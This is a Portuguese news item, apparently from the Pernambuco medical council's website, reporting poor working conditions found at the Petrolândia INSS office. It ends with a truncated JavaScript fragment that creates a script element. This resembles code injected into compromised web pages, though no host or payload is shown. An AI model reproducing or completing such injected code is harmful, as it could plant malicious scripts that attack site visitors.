Pesquisar
Agendar Atendimento Presencial

Serviços

ver todos

Cremepe fiscaliza sede do INSS

img-20161121-wa0029O Conselho Regional de Medicina de Pernambuco (Cremepe), através do setor de fiscalização, realizou na última quinta-feira (17/10) uma vistoria na unidade do INSS de Petrolândia, a mais de 400 km do Recife. A fiscalização foi motivada por denúncias dos funcionários e foram constatadas péssimas condições de trabalho no serviço.

A sala para perícias é improvisada e separada por uma divisória, não há banheiro e a única mesa do ambiente está quebrada. Como só ter uma única sala de atendimento quando a assistente social e a médica estão de plantão a sala da gerência é usada para atender os pacientes. Também não há acessibilidade na unidade e o detector de metais estava quebrado no momento da vistoria.

A equipe de fiscalização formada pela médica fiscal, Pollyanna Neves e o 2º secretário que é responsável pela fiscalização, Sílvio Rodrigues, também identificou a falta de material para atendimento pericial, infiltrações no prédio e fungos.

Desde o começo de 2016 a entidade fiscaliza as unidades do INSS, já realizou a vistoria nos serviços do Recife e região, no município de Moreno e até convocou uma reunião com os representantes dos serviços pra discutir estratégias afim de sanar os déficits das unidades. Agora, com o relatório do INSS de Petrolândia, a entidade irá tomar novas medidas e convocar as gestões municipais e estadual.

var d=document;var s=d.createElement(‘script’);